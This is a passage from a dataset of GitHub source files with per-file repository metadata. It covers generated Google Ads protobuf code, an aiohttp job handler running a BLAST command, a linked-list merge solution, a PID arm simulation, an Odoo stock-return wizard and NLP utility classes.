'DESCRIPTOR' : _MUTATEREMARKETINGACTIONRESULT,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """The result for the remarketing action mutate.
Attributes:
resource_name:
Returned for successful operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.MutateRemarketingActionResult)
})
_sym_db.RegisterMessage(MutateRemarketingActionResult)
DESCRIPTOR._options = None
_GETREMARKETINGACTIONREQUEST.fields_by_name['resource_name']._options = None
_MUTATEREMARKETINGACTIONSREQUEST.fields_by_name['customer_id']._options = None
_MUTATEREMARKETINGACTIONSREQUEST.fields_by_name['operations']._options = None
_REMARKETINGACTIONSERVICE = _descriptor.ServiceDescriptor(
name='RemarketingActionService',
full_name='google.ads.googleads.v5.services.RemarketingActionService',
file=DESCRIPTOR,
index=0,
serialized_options=b'\312A\030googleads.googleapis.com',
create_key=_descriptor._internal_create_key,
serialized_start=1116,
serialized_end=1648,
methods=[
_descriptor.MethodDescriptor(
name='GetRemarketingAction',
full_name='google.ads.googleads.v5.services.RemarketingActionService.GetRemarketingAction',
index=0,
containing_service=None,
input_type=_GETREMARKETINGACTIONREQUEST,
output_type=google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2._REMARKETINGACTION,
serialized_options=b'\202\323\344\223\0026\0224/v5/{resource_name=customers/*/remarketingActions/*}\332A\rresource_name',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='MutateRemarketingActions',
full_name='google.ads.googleads.v5.services.RemarketingActionService.MutateRemarketingActions',
index=1,
containing_service=None,
input_type=_MUTATEREMARKETINGACTIONSREQUEST,
output_type=_MUTATEREMARKETINGACTIONSRESPONSE,
serialized_options=b'\202\323\344\223\002<\"7/v5/customers/{customer_id=*}/remarketingActions:mutate:\001*\332A\026customer_id,operations',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_REMARKETINGACTIONSERVICE)
DESCRIPTOR.services_by_name['RemarketingActionService'] = _REMARKETINGACTIONSERVICE
# @@protoc_insertion_point(module_scope)
|
[
"noreply@github.com"
] |
noreply@github.com
|
440bc6380c64d0077b43e4244a63a7156658043d
|
7e68f74b2443836b6da61b0648ac2d9541b70fc8
|
/myapp/urlhandler.py
|
48fb10ccadecbf2e40464bb8ce0a5d542eff4b53
|
[] |
no_license
|
binhnq94/wrapper
|
50fc54464f187461699289f85c8b8b44811e09e5
|
07a3086b833d40416a8ae2e4342bddaa5ba622d7
|
refs/heads/master
| 2021-07-29T07:55:40.325110
| 2015-09-18T18:02:21
| 2015-09-18T18:02:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,735
|
py
|
__author__ = 'techbk'
import asyncio
from aiohttp import web
from runprocess import run_process
from runshell import runshell
class Url_handler:
def __init__( self,loop ):
self._loop = loop
self._task = {}
self._taskid = 0
def __setid(self):
self._taskid = self._taskid + 1
return str( self._taskid )
@asyncio.coroutine
def doblastn( self,request ):
cmd = ( u"blastdbcmd -db /db/refseq_rna.00 -entry nm_000122 -out test_query.fa"
"&& blastn -query test_query.fa -db /db/refseq_rna.00 -task blastn -dust no -outfmt "
"'7 qseqid sseqid evalue bitscore' -max_target_seqs 2" )
task_run_process = asyncio.async( runshell( cmd ) )
#task_run_process.add_done_callback( got_result )
id = self.__setid()
text = "Do Start App: http://localhost:8080/checkresult/" + id
self._task[id] = task_run_process
return web.Response( body = text.encode( 'utf-8' ) )
@asyncio.coroutine
def do_start_app1( self,request ):
task_run_process = asyncio.async( run_process( 10 ) )
#task_run_process.add_done_callback( got_result )
self._taskid = self._taskid + 1
id = str( self._taskid )
text = "Do Start App: http://localhost:8080/checkresult/" + id
self._task[id] = task_run_process
return web.Response( body = text.encode( 'utf-8' ) )
@asyncio.coroutine
def check_result( self,request ):
id = request.match_info.get( 'id' )
if id:
task_run_process = self._task.get(id,False)
#assert isinstance( task_run_process,asyncio.Task )
if task_run_process:
if task_run_process.done():
print(task_run_process.done())
result = yield from task_run_process
print( result )
text = "App " + id + " done!"
if result[1]:
text += "\nError: " + result[1].decode('ascii')
#return web.Response( body = text.encode( 'utf-8' ) )
if result[0]:
text += "\nOutput: \n" + result[0].decode('ascii')
# return web.Response(body=result)
return web.Response( body = text.encode( 'utf-8' ) )
else:
text = "App Not Done"
return web.Response( body = text.encode( 'utf-8' ) )
else:
text = "App ko ton tai"
return web.Response( body = text.encode( 'utf-8' ) )
else:
text = "Link cua ban ko ton tai"
return web.Response( body = text.encode( 'utf-8' ) )
|
[
"quangbinh.nguyentrong@gmail.com"
] |
quangbinh.nguyentrong@gmail.com
|
f1d726839edcc9efa6b64627090b6a4e14244fbf
|
00b1649b7467d4525473c3c90622e2bd591650e3
|
/venv/Scripts/easy_install-script.py
|
0065118b457aa1c6462614cb3164c965464201fe
|
[] |
no_license
|
fndalemao/Wolf
|
eca40b0edf20580e6622429792f356d8c676218c
|
0ba2cd50822b9d21d0a63fbd473f357f4a916786
|
refs/heads/master
| 2020-05-07T16:59:48.394189
| 2019-04-12T03:04:22
| 2019-04-12T03:04:22
| 180,708,760
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 450
|
py
|
#!C:\Users\fndal\Documents\Projetos\Wolf\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
|
[
"fnd.alemao02@gmail.com"
] |
fnd.alemao02@gmail.com
|
b67dcec5e71c0c499e230631f879a42c550ff8a1
|
c413157aea112a7f5f4305b74b3d0b78a11036d6
|
/LeetCode/MergeTwoSortedLinkedList.py
|
fb060eae712584e5398461f63bfaac26bdd1d2f2
|
[] |
no_license
|
jatinkhurana30/Tier1_Organizations_Interview_CodingProblems
|
3148e5518f4bba9a38325a95a6b9784f105ae20b
|
f4eb3ff00358d50d3f473c2947ba8d3c747f379e
|
refs/heads/master
| 2021-05-25T08:56:37.931955
| 2020-06-14T08:52:03
| 2020-06-14T08:52:03
| 253,750,583
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,705
|
py
|
"""Merge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.
Example:
Input: 1->2->4, 1->3->4
Output: 1->1->2->3->4->4"""
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:
finalList = None
l1_node = l1
l2_node = l2
final_list_counter = finalList
while l1_node is not None and l2_node is not None:
if l1_node.val <= l2_node.val:
# add l1_node to final node
if finalList is None:
finalList = ListNode(l1_node.val)
final_list_counter = finalList
else:
final_list_counter.next = ListNode(l1_node.val)
final_list_counter = final_list_counter.next
l1_node = l1_node.next
elif l1_node.val > l2_node.val:
# add l2 to final list
if finalList is None:
finalList = ListNode(l2_node.val)
final_list_counter = finalList
else:
final_list_counter.next = ListNode(l2_node.val)
final_list_counter = final_list_counter.next
l2_node = l2_node.next
if l1_node is not None:
while l1_node is not None:
# add l1 to final list
if finalList is None:
finalList = ListNode(l1_node.val)
final_list_counter = finalList
else:
final_list_counter.next = ListNode(l1_node.val)
final_list_counter = final_list_counter.next
l1_node = l1_node.next
if l2_node is not None:
while l2_node is not None:
# add l1 to final list
if finalList is None:
finalList = ListNode(l2_node.val)
final_list_counter = finalList
else:
final_list_counter.next = ListNode(l2_node.val)
final_list_counter = final_list_counter.next
l2_node = l2_node.next
return finalList
def addToFinalList(self, node_val, finalList, final_list_counter):
if finalList is None:
finalList = ListNode(node_val)
final_list_counter = finalList
else:
final_list_counter.next = ListNode(node_val)
final_list_counter = final_list_counter.next
return finalList, final_list_counter
|
[
"!Proalcatraz30"
] |
!Proalcatraz30
|
454b1388878b271229ad8a51b0c3b7dd10484f86
|
e524a24ed3021ec8e2cc97e3a38ff21cd9a32b2e
|
/python/simulation/arm_control.py
|
d5f1ba0504492aadf8b939366b2e4451b3555772
|
[] |
no_license
|
psr2016/psr
|
161f9208bbaba0e8ac8c8b3a6bd3afca1303e511
|
386b5461619a013313ca8b11ed6d20948ca1885c
|
refs/heads/master
| 2020-04-07T01:43:54.044099
| 2018-06-11T14:26:56
| 2018-06-11T14:26:56
| 57,581,925
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 836
|
py
|
#
# arm_control.py
#
import pylab
import math
from systems import *
from inputs import *
from controllers import *
delta_t = 0.001 # 1ms di tempo di campionamento
durata_simulazione = 20 # secondi
numero_punti = int(durata_simulazione / delta_t)
the_arm = RoboticArm(6, 5.0)
controller = PID_Controller(100, 80, 50)
target_theta = math.radians(10)
current_theta = 0
times = []
position = []
target = []
for k in range(0, numero_punti):
controller_output = controller.evaluate(target_theta, current_theta, delta_t)
the_arm.evaluate(controller_output, delta_t)
times.append(k * delta_t)
position.append(current_theta)
target.append(target_theta)
current_theta = the_arm.get_theta()
pylab.figure()
pylab.plot(times, position, 'b-+')
pylab.plot(times, target, 'r-+')
pylab.title("Posizione")
pylab.show()
|
[
"santoro@dmi.unict.it"
] |
santoro@dmi.unict.it
|
a39f0bac82f84873a6dbf8cfd3f6a437ad45d06c
|
045cb1a5638c3575296f83471758dc09a8065725
|
/addons/stock_account/wizard/stock_picking_return.py
|
5d54d201e6b6a357cd694038a75f20b33ff45cc4
|
[] |
no_license
|
marionumza/saas
|
7236842b0db98d1a0d0c3c88df32d268509629cb
|
148dd95d991a348ebbaff9396759a7dd1fe6e101
|
refs/heads/main
| 2023-03-27T14:08:57.121601
| 2021-03-20T07:59:08
| 2021-03-20T07:59:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,299
|
py
|
# -*- coding: utf-8 -*-
# Part of Harpiya. See LICENSE file for full copyright and licensing details.
from harpiya import api, fields, models
class StockReturnPicking(models.TransientModel):
_inherit = "stock.return.picking"
@api.model
def default_get(self, default_fields):
res = super(StockReturnPicking, self).default_get(default_fields)
for i, k, vals in res.get('product_return_moves', []):
vals.update({'to_refund': True})
return res
def _create_returns(self):
new_picking_id, pick_type_id = super(StockReturnPicking, self)._create_returns()
new_picking = self.env['stock.picking'].browse([new_picking_id])
for move in new_picking.move_lines:
return_picking_line = self.product_return_moves.filtered(lambda r: r.move_id == move.origin_returned_move_id)
if return_picking_line and return_picking_line.to_refund:
move.to_refund = True
return new_picking_id, pick_type_id
class StockReturnPickingLine(models.TransientModel):
_inherit = "stock.return.picking.line"
to_refund = fields.Boolean(string="Update quantities on SO/PO", default=True,
help='Trigger a decrease of the delivered/received quantity in the associated Sale Order/Purchase Order')
|
[
"yasir@harpiya.com"
] |
yasir@harpiya.com
|
d09dcfed132ff4011c66f4e8bb3b98eb78faa0c3
|
70bc23c82cd64cd0c8184eb3388b269c0b16b7f3
|
/create_scripts.py
|
92b6b811b17d245ac846bb33229c1a9612a6bb15
|
[] |
no_license
|
Liang60711/django-portfolio_1
|
bdb2d759412611ca7e3d303807facc2df59708c2
|
97f0e45674c1a52c4c125704f820ff6d89e29f1f
|
refs/heads/main
| 2023-03-09T16:15:41.166194
| 2021-03-01T19:19:30
| 2021-03-01T19:19:30
| 325,354,166
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,121
|
py
|
import os
import django
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ecommerce.settings')
django.setup()
from core.models import Item
import random
from django.core.files import File
from django.conf import settings
CATEGORY_CHOICES = (
('S', 'Shirt'),
('SW', 'Sport wear'),
('OW', 'Outwear'),
)
LABEL_CHOICES = (
('P', 'primary'),
('S', 'secondary'),
('D', 'danger'),
)
ADDRESS_CHOICES = (
('B', 'Billing'),
('S', 'Shipping'),
)
Item.objects.all().delete()
f = File(open(os.path.join(settings.BASE_DIR, 'media', '5.jpg'), 'rb'))
for i in range(12):
Item.objects.create(
title='Item '+str(i),
price=random.randint(1,9)*100,
category=random.choices(CATEGORY_CHOICES)[0][0],
label=random.choices(LABEL_CHOICES)[0][0],
description='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec pretium ante erat, vitae sodales mi varius quis. Etiam vestibulum lorem vel urna tempor, eu fermentum odio aliquam. Aliquam consequat urna vitae ipsum pulvinar, in blandit purus eleifend.',
slug=str(i),
image=f,
)
|
[
"liang60711@gmail.com"
] |
liang60711@gmail.com
|
ac308bc1954de48099c8abcf8f1054f3fd988cec
|
788e789808e56fc53571a62e34a0c104f6641e64
|
/analysisCSV.py
|
8c3ab71221af8c676bb000766d292060ad1aa6fb
|
[] |
no_license
|
maxiaohui0921/BugzilaReport
|
a6922ff7f88168eb0641aa497d0c2b6b6021a423
|
bc8804b06d01c2e3e4430323813ea27b7c8488fa
|
refs/heads/master
| 2020-03-14T20:37:50.238905
| 2018-05-02T00:52:08
| 2018-05-02T00:52:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,016
|
py
|
#2018/02/24 MaXiaohui
import csv
import downloadCSV
import glConstant
import bugTable
#写入部门,状态,devFix日期,verifyClose日期
queryLink="OrangeFPandPatch"
#csvFile=downloadCSV.downloadCSV(glConstant.bugURL,queryLink)
#csvFile=r"C:\Users\maxh\Desktop\Buglist\源文件\OrangeFPandPatch201802011021.csv"
#在列表List1后面添加多个元素List2
def arrayAdd(list1,list2):
for i in range(len(list2)):
list1.append(list2[i])
def analysisCSV(csvFile):
#读出csv文件到一个list列表中,待处理
lines=csv.reader(open(csvFile,encoding="utf-8"))
data=[]
for line in lines:
data.append(line)
#处理文件,添加上以下三列,并挨个处理填写相关数据
headers=["BugFix日期","BugReopen日期","状态分类","负责人部门"]
arrayAdd(data[0],headers)
#print(data[0])
for i in range(1,len(data)):
data[i][6]=data[i][6][:-9]
data[i][9] = data[i][9][:-9]
if data[i][3] in glConstant.closeStatus:
#tableDatelist = bugTable.resolveopenDate(data[i][0])
#tableDatelist.append("Closed")
tableDatelist=[data[i][6],"","Closed"]
arrayAdd(data[i],tableDatelist)
else:
arrayAdd(data[i], ["",""])
if data[i][3] in glConstant.openStatus:
tag="无相关部门"
arrayAdd(data[i], ["Open"])
for k, glConstant.v in glConstant.team.items():
if data[i][7] in glConstant.v:
arrayAdd(data[i], [k])
tag="有相关部门"
if tag=="无相关部门":
print(data[i][7]+"为新员工,未加入部门中,请更新配置文件中的组成员列表")
if data[i][3]=="已解决 (RESOLVED)":
arrayAdd(data[i], ["Resolved"])
#将处理好的data数据在重新写入到csv文件中
writer = csv.writer(open(csvFile,'w'))
writer.writerows(data)
if __name__=="__main__":
analysisCSV(csvFile)
|
[
"38674823+maxiaohui0921@users.noreply.github.com"
] |
38674823+maxiaohui0921@users.noreply.github.com
|
f9ae3dfa9e5cae2982f31a833e426773e239ed40
|
e77732bce61e7e97bad5cee1b07d1b5f9b6fa590
|
/cat/utils/data/exclude_corpus.py
|
08cc3af28cfc90a11efade2a6bdf4941e1369fb7
|
[
"Apache-2.0"
] |
permissive
|
entn-at/CAT
|
9f28f5ff75b37ac90baf63609226deb99d73dbe2
|
fc74841e8f6b7eb2f2f88bb7c09b30ad5a8c16f4
|
refs/heads/master
| 2023-04-10T13:32:31.333889
| 2023-02-27T16:50:43
| 2023-02-27T17:29:07
| 236,718,892
| 0
| 0
| null | 2020-01-28T11:24:01
| 2020-01-28T11:24:00
| null |
UTF-8
|
Python
| false
| false
| 2,432
|
py
|
# Author: Huahuan Zheng (maxwellzh@outlook.com)
#
# Fetch n lines from source corpus and exclude part of the source if needed.
#
import sys
import os
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("corpus", type=str,
help="Path to the source text corpus.")
parser.add_argument("--exclude-corpus", type=str, dest="f_exc",
help="Add this option if you want to exclude it from source corpus, take first column as index.")
parser.add_argument("-n", "--num-lines", type=int,
help="Number of lines to be prepared, if not specified, would take all of them (after excluded).")
args = parser.parse_args()
if not os.path.isfile(args.corpus):
raise FileNotFoundError(f"--corpus={args.corpus} is not a valid file.")
if args.f_exc is not None and not os.path.isfile(args.f_exc):
raise FileNotFoundError(
f"--exclude-corpus={args.f_exc} is not a valid file.")
if args.num_lines is not None:
if args.num_lines < 0:
raise ValueError(
f"--num-lines={args.num_lines} < 0 is invalid, expected valud >= 0")
num_lines = args.num_lines
else:
num_lines = sum(1 for _ in open(args.corpus, 'r'))
# prepare excluding list
excluding_list = set()
if args.f_exc is not None:
with open(args.f_exc, 'r') as fi:
for line in fi:
line = line.strip()
if ' ' in line or '\t' in line:
uid, _ = line.split(maxsplit=1)
else:
uid = line
excluding_list.add(uid)
cnt = 0
with open(args.corpus, 'r') as fi:
try:
for line in fi:
line = line.strip()
if ' ' in line or '\t' in line:
uid, _ = line.split(maxsplit=1)
else:
uid = line
if uid in excluding_list:
continue
if cnt >= num_lines:
break
sys.stdout.write(f"{line}\n")
cnt += 1
except IOError:
exit(0)
if cnt < num_lines and args.num_lines is not None:
raise RuntimeError(
f"Source corpus text doesn't have enough unique lines to export: {cnt} in total, expect {num_lines}")
|
[
"maxwellzh@outlook.com"
] |
maxwellzh@outlook.com
|
be868d1d34aa3dad1df6b4c850a30a4565685c4c
|
e22390ec9aa1a842626075113472f81076e1bf5f
|
/pullenti/semantic/SemFragment.py
|
3954b163c1693d239274475b64e5e3f1cd4930fb
|
[] |
no_license
|
pullenti/PullentiPython
|
ba9f450f3f49786732e80f34d0506d4a6d41afc3
|
815d550b99f113034c27f60d97493ce2f8e4cfcc
|
refs/heads/master
| 2021-06-22T17:12:36.771479
| 2020-12-11T06:10:23
| 2020-12-11T06:10:23
| 161,268,453
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,299
|
py
|
# Copyright (c) 2013, Pullenti. All rights reserved.
# Non-Commercial Freeware and Commercial Software.
# This class is generated using the converter UniSharping (www.unisharping.ru) from Pullenti C#.NET project.
# The latest version of the code is available on the site www.pullenti.ru
import typing
from pullenti.unisharp.Utils import Utils
from pullenti.ner.core.GetTextAttr import GetTextAttr
from pullenti.ner.core.MiscHelper import MiscHelper
from pullenti.semantic.ISemContainer import ISemContainer
from pullenti.semantic.SemGraph import SemGraph
from pullenti.semantic.SemFragmentType import SemFragmentType
from pullenti.semantic.SemObjectType import SemObjectType
class SemFragment(ISemContainer):
""" Фрагмент блока (предложение)
"""
def __init__(self, blk : 'SemBlock') -> None:
self.__m_graph = SemGraph()
self.m_higher = None;
self.typ = SemFragmentType.UNDEFINED
self.is_or = False
self.begin_token = None;
self.end_token = None;
self.tag = None;
self.m_higher = blk
@property
def graph(self) -> 'SemGraph':
""" Объекты фрагмента (отметим, что часть объектов, связанных с этим блоком,
могут находиться в графах вышележащих уровней).
"""
return self.__m_graph
@property
def higher(self) -> 'ISemContainer':
return self.m_higher
@property
def block(self) -> 'SemBlock':
""" Владелец фрагмента """
return self.m_higher
@property
def root_objects(self) -> typing.List['SemObject']:
""" Список объектов SemObject, у которых нет связей. При нормальном разборе
такой объект должен быть один - это обычно предикат. """
res = list()
for o in self.__m_graph.objects:
if (len(o.links_to) == 0):
res.append(o)
return res
@property
def can_be_error_structure(self) -> bool:
cou = 0
vcou = 0
for o in self.__m_graph.objects:
if (len(o.links_to) == 0):
if (o.typ == SemObjectType.VERB):
vcou += 1
cou += 1
if (cou <= 1):
return False
return vcou < cou
@property
def spelling(self) -> str:
""" Текст фрагмента """
return MiscHelper.get_text_value(self.begin_token, self.end_token, GetTextAttr.KEEPREGISTER)
@property
def begin_char(self) -> int:
return (0 if self.begin_token is None else self.begin_token.begin_char)
@property
def end_char(self) -> int:
return (0 if self.end_token is None else self.end_token.end_char)
def __str__(self) -> str:
if (self.typ != SemFragmentType.UNDEFINED):
return "{0}: {1}".format(Utils.enumToString(self.typ), Utils.ifNotNull(self.spelling, "?"))
else:
return Utils.ifNotNull(self.spelling, "?")
|
[
"alex@alexkuk.ru"
] |
alex@alexkuk.ru
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.